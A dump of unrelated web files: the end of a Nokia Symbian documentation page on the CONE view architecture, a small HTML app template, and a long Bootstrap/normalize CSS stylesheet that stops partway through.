href="GUID-2C5E3F6C-6679-3914-9736-62296E7715A7.html"> <span class="apiname"> MCoeView </span> </a> interface. Typically they are top-level window-owning controls. </p> <p> The significance of views is that they are known of outside the application to which they belong. This allows one application to switch, or link, directly to a view in another. If the target application is running it will be brought to the foreground with the linked view activated. If it isn't running it will be started up first. </p> <p> All of the API required for implementing, registering, activating, deactivating, linking and observing is provided by <a href="GUID-2C5E3F6C-6679-3914-9736-62296E7715A7.html"> <span class="apiname"> MCoeView </span> </a> and <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> . </p> <p> To participate fully in the view architecture an application must register at least one view. An application with no views may still be linked to using the view architecture. It registers itself with a <samp class="codeph"> TVwsViewId </samp> containing its application UID. Obviously it will not receive activation and deactivation events but will trigger view switch events in other applications' views. </p> <p> An application may opt out of the view architecture (see TApaCommand::EApaCommandRunWithoutViews and TApaCommand::EApaCommandBackgroundAndWithoutViews ) </p> </li> </ul> </div> <div> <ul class="ullinks"> <li class="ulchildlink"> <strong> <a href="GUID-971C9B81-1D6F-59E7-9416-385A0787D642.html"> The control stack </a> </strong> <br /> </li> <li class="ulchildlink"> <strong> <a href="GUID-06676D89-FDE7-58FD-9D2E-3C984CD24BAC.html"> Embedded applications </a> </strong> <br /> </li> </ul> <div class="familylinks"> <div class="parentlink"> <strong> Parent topic: </strong> <a href="GUID-6C16417B-5B37-5310-B59A-750D971AA6D4.html"> The UI Control Framework (CONE) </a> </div> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
resources/templates/index.html
gorillalabs/dekk
<html> <head> <meta charset="utf-8"> <!-- re-com styles --> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/css/bootstrap.css"> <link rel="stylesheet" href="assets/css/material-design-iconic-font.min.css"> <link rel="stylesheet" href="assets/css/re-com.css"> <link href="http://fonts.googleapis.com/css?family=Roboto:300,400,500,700,400italic" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto+Condensed:400,300' rel='stylesheet' type='text/css'> <!-- /re-com styles --> </head> <body> <div id="app"></div> <script src="js/app.js" type="text/javascript"></script> </body> </html>
resources/public/css/styles.css
sethtrain/mantlerock
/*! normalize.css v3.0.0 | MIT License | git.io/normalize */ html { font-family: sans-serif; -ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; } body { margin: 0; } article, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary { display: block; } audio, canvas, progress, video { display: inline-block; vertical-align: baseline; } audio:not([controls]) { display: none; height: 0; } [hidden], template { display: none; } a { background: transparent; } a:active, a:hover { outline: 0; } abbr[title] { border-bottom: 1px dotted; } b, strong { font-weight: bold; } dfn { font-style: italic; } h1 { font-size: 2em; margin: 0.67em 0; } mark { background: #ff0; color: #000; } small { font-size: 80%; } sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } img { border: 0; } svg:not(:root) { overflow: hidden; } figure { margin: 1em 40px; } hr { -moz-box-sizing: content-box; box-sizing: content-box; height: 0; } pre { overflow: auto; } code, kbd, pre, samp { font-family: monospace, monospace; font-size: 1em; } button, input, optgroup, select, textarea { color: inherit; font: inherit; margin: 0; } button { overflow: visible; } button, select { text-transform: none; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } button[disabled], html input[disabled] { cursor: default; } button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } input { line-height: normal; } input[type="checkbox"], input[type="radio"] { box-sizing: border-box; padding: 0; } input[type="number"]::-webkit-inner-spin-button, input[type="number"]::-webkit-outer-spin-button { height: auto; } input[type="search"] { -webkit-appearance: textfield; -moz-box-sizing: content-box; -webkit-box-sizing: content-box; box-sizing: content-box; } input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; } fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } legend { border: 0; padding: 0; } textarea { overflow: auto; } optgroup { font-weight: bold; } table { border-collapse: collapse; border-spacing: 0; } td, th { padding: 0; } @media print { * { text-shadow: none !important; color: #000 !important; background: transparent !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } select { background: #fff !important; } .navbar { display: none; } .table td, .table th { background-color: #fff !important; } .btn > .caret, .dropup > .btn > .caret { border-top-color: #000 !important; } .label { border: 1px solid #000; } .table { border-collapse: collapse !important; } .table-bordered th, .table-bordered td { border: 1px solid #ddd !important; } } * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } *:before, *:after { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } html { font-size: 62.5%; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 1.42857143; color: #333333; background-color: #ffffff; } input, button, select, textarea { font-family: inherit; font-size: inherit; line-height: inherit; } a { color: #428bca; text-decoration: none; } a:hover, a:focus { color: #2a6496; text-decoration: underline; } a:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } figure { margin: 0; } img { vertical-align: middle; } .img-responsive, .thumbnail > img, .thumbnail a > img, .carousel-inner > .item > img, .carousel-inner > .item > a > img { display: block; max-width: 100%; height: auto; } .img-rounded { border-radius: 6px; } .img-thumbnail { padding: 4px; line-height: 1.42857143; background-color: #ffffff; border: 1px solid #dddddd; border-radius: 4px; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; display: inline-block; max-width: 100%; height: auto; } .img-circle { border-radius: 50%; } hr { margin-top: 20px; margin-bottom: 20px; border: 0; border-top: 1px solid #eeeeee; } .sr-only { position: absolute; width: 1px; height: 1px; margin: -1px; padding: 0; overflow: hidden; clip: rect(0, 0, 0, 0); border: 0; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { font-family: inherit; font-weight: 500; line-height: 1.1; color: inherit; } h1 small, h2 small, h3 small, h4 small, h5 small, h6 small, .h1 small, .h2 small, .h3 small, .h4 small, .h5 small, .h6 small, h1 .small, h2 .small, h3 .small, h4 .small, h5 .small, h6 .small, .h1 .small, .h2 .small, .h3 .small, .h4 .small, .h5 .small, .h6 .small { font-weight: normal; line-height: 1; color: #999999; } h1, .h1, h2, .h2, h3, .h3 { margin-top: 20px; margin-bottom: 10px; } h1 small, .h1 small, h2 small, .h2 small, h3 small, .h3 small, h1 .small, .h1 .small, h2 .small, .h2 .small, h3 .small, .h3 .small { font-size: 65%; } h4, .h4, h5, .h5, h6, .h6 { margin-top: 10px; margin-bottom: 10px; } h4 small, .h4 small, h5 small, .h5 small, h6 small, .h6 small, h4 .small, .h4 .small, h5 .small, .h5 .small, h6 .small, .h6 .small { font-size: 75%; } h1, .h1 { font-size: 36px; } h2, .h2 { font-size: 30px; } h3, .h3 { font-size: 24px; } h4, .h4 { font-size: 18px; } h5, .h5 { font-size: 14px; } h6, .h6 { font-size: 12px; } p { margin: 0 0 10px; } .lead { margin-bottom: 20px; font-size: 16px; font-weight: 200; line-height: 1.4; } @media (min-width: 768px) { .lead { font-size: 21px; } } small, .small { font-size: 85%; } cite { font-style: normal; } .text-left { text-align: left; } .text-right { text-align: right; } .text-center { text-align: center; } .text-justify { text-align: justify; } .text-muted { color: #999999; } .text-primary { color: #428bca; } a.text-primary:hover { color: #3071a9; } .text-success { color: #3c763d; } a.text-success:hover { color: #2b542c; } .text-info { color: #31708f; } a.text-info:hover { color: #245269; } .text-warning { color: #8a6d3b; } a.text-warning:hover { color: #66512c; } .text-danger { color: #a94442; } a.text-danger:hover { color: #843534; } .bg-primary { color: #fff; background-color: #428bca; } a.bg-primary:hover { background-color: #3071a9; } .bg-success { background-color: #dff0d8; } a.bg-success:hover { background-color: #c1e2b3; } .bg-info { background-color: #d9edf7; } a.bg-info:hover { background-color: #afd9ee; } .bg-warning { background-color: #fcf8e3; } a.bg-warning:hover { background-color: #f7ecb5; } .bg-danger { background-color: #f2dede; } a.bg-danger:hover { background-color: #e4b9b9; } .page-header { padding-bottom: 9px; margin: 40px 0 20px; border-bottom: 1px solid #eeeeee; } ul, ol { margin-top: 0; margin-bottom: 10px; } ul ul, ol ul, ul ol, ol ol { margin-bottom: 0; } .list-unstyled { padding-left: 0; list-style: none; } .list-inline { padding-left: 0; list-style: none; margin-left: -5px; } .list-inline > li { display: inline-block; padding-left: 5px; padding-right: 5px; } dl { margin-top: 0; margin-bottom: 20px; } dt, dd { line-height: 1.42857143; } dt { font-weight: bold; } dd { margin-left: 0; } @media (min-width: 768px) { .dl-horizontal dt { float: left; width: 160px; clear: left; text-align: right; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .dl-horizontal dd { margin-left: 180px; } } abbr[title], abbr[data-original-title] { cursor: help; border-bottom: 1px dotted #999999; } .initialism { font-size: 90%; text-transform: uppercase; } blockquote { padding: 10px 20px; margin: 0 0 20px; font-size: 17.5px; border-left: 5px solid #eeeeee; } blockquote p:last-child, blockquote ul:last-child, blockquote ol:last-child { margin-bottom: 0; } blockquote footer, blockquote small, blockquote .small { display: block; font-size: 80%; line-height: 1.42857143; color: #999999; } blockquote footer:before, blockquote small:before, blockquote .small:before { content: '\2014 \00A0'; } .blockquote-reverse, blockquote.pull-right { padding-right: 15px; padding-left: 0; border-right: 5px solid #eeeeee; border-left: 0; text-align: right; } .blockquote-reverse footer:before, blockquote.pull-right footer:before, .blockquote-reverse small:before, blockquote.pull-right small:before, .blockquote-reverse .small:before, blockquote.pull-right .small:before { content: ''; } .blockquote-reverse footer:after, blockquote.pull-right footer:after, .blockquote-reverse small:after, blockquote.pull-right small:after, .blockquote-reverse .small:after, blockquote.pull-right .small:after { content: '\00A0 \2014'; } blockquote:before, blockquote:after { content: ""; } address { margin-bottom: 20px; font-style: normal; line-height: 1.42857143; } code, kbd, pre, samp { font-family: Menlo, Monaco, Consolas, "Courier New", monospace; } code { padding: 2px 4px; font-size: 90%; color: #c7254e; background-color: #f9f2f4; white-space: nowrap; border-radius: 4px; } kbd { padding: 2px 4px; font-size: 90%; color: #ffffff; background-color: #333333; border-radius: 3px; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25); } pre { display: block; padding: 9.5px; margin: 0 0 10px; font-size: 13px; line-height: 1.42857143; word-break: break-all; word-wrap: break-word; color: #333333; background-color: #f5f5f5; border: 1px solid #cccccc; border-radius: 4px; } pre code { padding: 0; font-size: inherit; color: inherit; white-space: pre-wrap; background-color: transparent; border-radius: 0; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } .container { margin-right: auto; margin-left: auto; padding-left: 15px; padding-right: 15px; } @media (min-width: 768px) { .container { width: 750px; } } @media (min-width: 992px) { .container { width: 970px; } } @media (min-width: 1200px) { .container { width: 1170px; } } .container-fluid { margin-right: auto; margin-left: auto; padding-left: 15px; padding-right: 15px; } .row { margin-left: -15px; margin-right: -15px; } .col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 { position: relative; min-height: 1px; padding-left: 15px; padding-right: 15px; } .col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666667%; } .col-xs-10 { width: 83.33333333%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666667%; } .col-xs-7 { width: 58.33333333%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666667%; } .col-xs-4 { width: 33.33333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666667%; } .col-xs-pull-10 { right: 83.33333333%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666667%; } .col-xs-pull-7 { right: 58.33333333%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666667%; } .col-xs-pull-4 { right: 33.33333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.66666667%; } .col-xs-pull-1 { right: 8.33333333%; } .col-xs-pull-0 { right: 0%; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666667%; } .col-xs-push-10 { left: 83.33333333%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666667%; } .col-xs-push-7 { left: 58.33333333%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666667%; } .col-xs-push-4 { left: 33.33333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.66666667%; } .col-xs-push-1 { left: 8.33333333%; } .col-xs-push-0 { left: 0%; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-xs-offset-10 { margin-left: 83.33333333%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666667%; } .col-xs-offset-7 { margin-left: 58.33333333%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666667%; } .col-xs-offset-4 { margin-left: 33.33333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.66666667%; } .col-xs-offset-1 { margin-left: 8.33333333%; } .col-xs-offset-0 { margin-left: 0%; } @media (min-width: 768px) { .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666667%; } .col-sm-7 { width: 58.33333333%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666667%; } .col-sm-4 { width: 33.33333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.66666667%; } .col-sm-1 { width: 8.33333333%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666667%; } .col-sm-pull-10 { right: 83.33333333%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666667%; } .col-sm-pull-7 { right: 58.33333333%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666667%; } .col-sm-pull-4 { right: 33.33333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.66666667%; } .col-sm-pull-1 { right: 8.33333333%; } .col-sm-pull-0 { right: 0%; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666667%; } .col-sm-push-10 { left: 83.33333333%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666667%; } .col-sm-push-7 { left: 58.33333333%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666667%; } .col-sm-push-4 { left: 33.33333333%; } .col-sm-push-3 { left: 25%; } .col-sm-push-2 { left: 16.66666667%; } .col-sm-push-1 { left: 8.33333333%; } .col-sm-push-0 { left: 0%; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666667%; } .col-sm-offset-10 { margin-left: 83.33333333%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666667%; } .col-sm-offset-7 { margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 { margin-left: 33.33333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.66666667%; } .col-sm-offset-1 { margin-left: 8.33333333%; } .col-sm-offset-0 { margin-left: 0%; } } @media (min-width: 992px) { .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666667%; } .col-md-10 { width: 83.33333333%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666667%; } .col-md-7 { width: 58.33333333%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666667%; } .col-md-4 { width: 33.33333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.66666667%; } .col-md-1 { width: 8.33333333%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666667%; } .col-md-pull-10 { right: 83.33333333%; } .col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666667%; } .col-md-pull-7 { right: 58.33333333%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666667%; } .col-md-pull-4 { right: 33.33333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.66666667%; } .col-md-pull-1 { right: 8.33333333%; } .col-md-pull-0 { right: 0%; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666667%; } .col-md-push-10 { left: 83.33333333%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666667%; } .col-md-push-7 { left: 58.33333333%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666667%; } .col-md-push-4 { left: 33.33333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.66666667%; } .col-md-push-1 { left: 8.33333333%; } .col-md-push-0 { left: 0%; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666667%; } .col-md-offset-10 { margin-left: 83.33333333%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666667%; } .col-md-offset-7 { margin-left: 58.33333333%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666667%; } .col-md-offset-4 { margin-left: 33.33333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.66666667%; } .col-md-offset-1 { margin-left: 8.33333333%; } .col-md-offset-0 { margin-left: 0%; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666667%; } .col-lg-10 { width: 83.33333333%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666667%; } .col-lg-7 { width: 58.33333333%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666667%; } .col-lg-4 { width: 33.33333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.66666667%; } .col-lg-1 { width: 8.33333333%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666667%; } .col-lg-pull-10 { right: 83.33333333%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666667%; } .col-lg-pull-7 { right: 58.33333333%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666667%; } .col-lg-pull-4 { right: 33.33333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.66666667%; } .col-lg-pull-1 { right: 8.33333333%; } .col-lg-pull-0 { right: 0%; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666667%; } .col-lg-push-10 { left: 83.33333333%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666667%; } .col-lg-push-7 { left: 58.33333333%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666667%; } .col-lg-push-4 { left: 33.33333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.66666667%; } .col-lg-push-1 { left: 8.33333333%; } .col-lg-push-0 { left: 0%; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666667%; } .col-lg-offset-10 { margin-left: 83.33333333%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666667%; } .col-lg-offset-7 { margin-left: 58.33333333%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666667%; } .col-lg-offset-4 { margin-left: 33.33333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.66666667%; } .col-lg-offset-1 { margin-left: 8.33333333%; } .col-lg-offset-0 { margin-left: 0%; } } table { max-width: 100%; background-color: transparent; } th { text-align: left; } .table { width: 100%; margin-bottom: 20px; } .table > thead > tr > th, .table > tbody > tr > th, .table > tfoot > tr > th, .table > thead > tr > td, .table > tbody > tr > td, .table > tfoot > tr > td { padding: 8px; line-height: 1.42857143; vertical-align: top; border-top: 1px solid #dddddd; } .table > thead > tr > th { vertical-align: bottom; border-bottom: 2px solid #dddddd; } .table > caption + thead > tr:first-child > th, .table > colgroup + thead > tr:first-child > th, .table > thead:first-child > tr:first-child > th, .table > caption + thead > tr:first-child > td, .table > colgroup + thead > tr:first-child > td, .table > thead:first-child > tr:first-child > td { border-top: 0; } .table > tbody + tbody { border-top: 2px solid #dddddd; } .table .table { background-color: #ffffff; } .table-condensed > thead > tr > th, .table-condensed > tbody > tr > th, .table-condensed > tfoot > tr > th, .table-condensed > thead > tr > td, .table-condensed > tbody > tr > td, .table-condensed > tfoot > tr > td { padding: 5px; } .table-bordered { border: 1px solid #dddddd; } .table-bordered > thead > tr > th, .table-bordered > tbody > tr > th, .table-bordered > tfoot > tr > th, .table-bordered > thead > tr > td, .table-bordered > tbody > tr > td, .table-bordered > tfoot > tr > td { border: 1px solid #dddddd; } .table-bordered > thead > tr > th, .table-bordered > thead > tr > td { border-bottom-width: 2px; } .table-striped > tbody > tr:nth-child(odd) > td, .table-striped > tbody > tr:nth-child(odd) > th { background-color: #f9f9f9; } .table-hover > tbody > tr:hover > td, .table-hover > tbody > tr:hover > th { background-color: #f5f5f5; } table col[class*="col-"] { position: static; float: none; display: table-column; } table td[class*="col-"], table th[class*="col-"] { position: static; float: none; display: table-cell; } .table > thead > tr > td.active, .table > tbody > tr > td.active, .table > tfoot > tr > td.active, .table > thead > tr > th.active, .table > tbody > tr > th.active, .table > tfoot > tr > th.active, .table > thead > tr.active > td, .table > tbody > tr.active > td, .table > tfoot > tr.active > td, .table > thead > tr.active > th, .table > tbody > tr.active > th, .table > tfoot > tr.active > th { background-color: #f5f5f5; } .table-hover > tbody > tr > td.active:hover, .table-hover > tbody > tr > th.active:hover, .table-hover > tbody > tr.active:hover > td, .table-hover > tbody > tr.active:hover > th { background-color: #e8e8e8; } .table > thead > tr > td.success, .table > tbody > tr > td.success, .table > tfoot > tr > td.success, .table > thead > tr > th.success, .table > tbody > tr > th.success, .table > tfoot > tr > th.success, .table > thead > tr.success > td, .table > tbody > tr.success > td, .table > tfoot > tr.success > td, .table > thead > tr.success > th, .table > tbody > tr.success > th, .table > tfoot > tr.success > th { background-color: #dff0d8; } .table-hover > tbody > tr > td.success:hover, .table-hover > tbody > tr > th.success:hover, .table-hover > tbody > tr.success:hover > td, .table-hover > tbody > tr.success:hover > th { background-color: #d0e9c6; } .table > thead > tr > td.info, .table > tbody > tr > td.info, .table > tfoot > tr > td.info, .table > thead > tr > th.info, .table > tbody > tr > th.info, .table > tfoot > tr > th.info, .table > thead > tr.info > td, .table > tbody > tr.info > td, .table > tfoot > tr.info > td, .table > thead > tr.info > th, .table > tbody > tr.info > th, .table > tfoot > tr.info > th { background-color: #d9edf7; } .table-hover > tbody > tr > td.info:hover, .table-hover > tbody > tr > th.info:hover, .table-hover > tbody > tr.info:hover > td, .table-hover > tbody > tr.info:hover > th { background-color: #c4e3f3; } .table > thead > tr > td.warning, .table > tbody > tr > td.warning, .table > tfoot > tr > td.warning, .table > thead > tr > th.warning, .table > tbody > tr > th.warning, .table > tfoot > tr > th.warning, .table > thead > tr.warning > td, .table > tbody > tr.warning > td, .table > tfoot > tr.warning > td, .table > thead > tr.warning > th, .table > tbody > tr.warning > th, .table > tfoot > tr.warning > th { background-color: #fcf8e3; } .table-hover > tbody > tr > td.warning:hover, .table-hover > tbody > tr > th.warning:hover, .table-hover > tbody > tr.warning:hover > td, .table-hover > tbody > tr.warning:hover > th { background-color: #faf2cc; } .table > thead > tr > td.danger, .table > tbody > tr > td.danger, .table > tfoot > tr > td.danger, .table > thead > tr > th.danger, .table > tbody > tr > th.danger, .table > tfoot > tr > th.danger, .table > thead > tr.danger > td, .table > tbody > tr.danger > td, .table > tfoot > tr.danger > td, .table > thead > tr.danger > th, .table > tbody > tr.danger > th, .table > tfoot > tr.danger > th { background-color: #f2dede; } .table-hover > tbody > tr > td.danger:hover, .table-hover > tbody > tr > th.danger:hover, .table-hover > tbody > tr.danger:hover > td, .table-hover > tbody > tr.danger:hover > th { background-color: #ebcccc; } @media (max-width: 767px) { .table-responsive { width: 100%; margin-bottom: 15px; overflow-y: hidden; overflow-x: scroll; -ms-overflow-style: -ms-autohiding-scrollbar; border: 1px solid #dddddd; -webkit-overflow-scrolling: touch; } .table-responsive > .table { margin-bottom: 0; } .table-responsive > .table > thead > tr > th, .table-responsive > .table > tbody > tr > th, .table-responsive > .table > tfoot > tr > th, .table-responsive > .table > thead > tr > td, .table-responsive > .table > tbody > tr > td, .table-responsive > .table > tfoot > tr > td { white-space: nowrap; } .table-responsive > .table-bordered { border: 0; } .table-responsive > .table-bordered > thead > tr > th:first-child, .table-responsive > .table-bordered > tbody > tr > th:first-child, .table-responsive > .table-bordered > tfoot > tr > th:first-child, .table-responsive > .table-bordered > thead > tr > td:first-child, .table-responsive > .table-bordered > tbody > tr > td:first-child, .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .table-responsive > .table-bordered > thead > tr > th:last-child, .table-responsive > .table-bordered > tbody > tr > th:last-child, .table-responsive > .table-bordered > tfoot > tr > th:last-child, .table-responsive > .table-bordered > thead > tr > td:last-child, .table-responsive > .table-bordered > tbody > tr > td:last-child, .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .table-responsive > .table-bordered > tbody > tr:last-child > th, .table-responsive > .table-bordered > tfoot > tr:last-child > th, .table-responsive > .table-bordered > tbody > tr:last-child > td, .table-responsive > .table-bordered > tfoot > tr:last-child > td { border-bottom: 0; } } fieldset { padding: 0; margin: 0; border: 0; min-width: 0; } legend { display: block; width: 100%; padding: 0; margin-bottom: 20px; font-size: 21px; line-height: inherit; color: #333333; border: 0; border-bottom: 1px solid #e5e5e5; } label { display: inline-block; margin-bottom: 5px; font-weight: bold; } input[type="search"] { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } input[type="radio"], input[type="checkbox"] { margin: 4px 0 0; margin-top: 1px \9; /* IE8-9 */ line-height: normal; } input[type="file"] { display: block; } input[type="range"] { display: block; width: 100%; } select[multiple], select[size] { height: auto; } input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } output { display: block; padding-top: 7px; font-size: 14px; line-height: 1.42857143; color: #555555; } .form-control { display: block; width: 100%; height: 34px; padding: 6px 12px; font-size: 14px; line-height: 1.42857143; color: #555555; background-color: #ffffff; background-image: none; border: 1px solid #cccccc; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; } .form-control:focus { border-color: #66afe9; outline: 0; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6); box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6); } .form-control::-moz-placeholder { color: #999999; opacity: 1; } .form-control:-ms-input-placeholder { color: #999999; } .form-control::-webkit-input-placeholder { color: #999999; } .form-control[disabled], .form-control[readonly], fieldset[disabled] .form-control { cursor: not-allowed; background-color: #eeeeee; opacity: 1; } textarea.form-control { height: auto; } input[type="search"] { -webkit-appearance: none; } input[type="date"] { line-height: 34px; } .form-group { margin-bottom: 15px; } 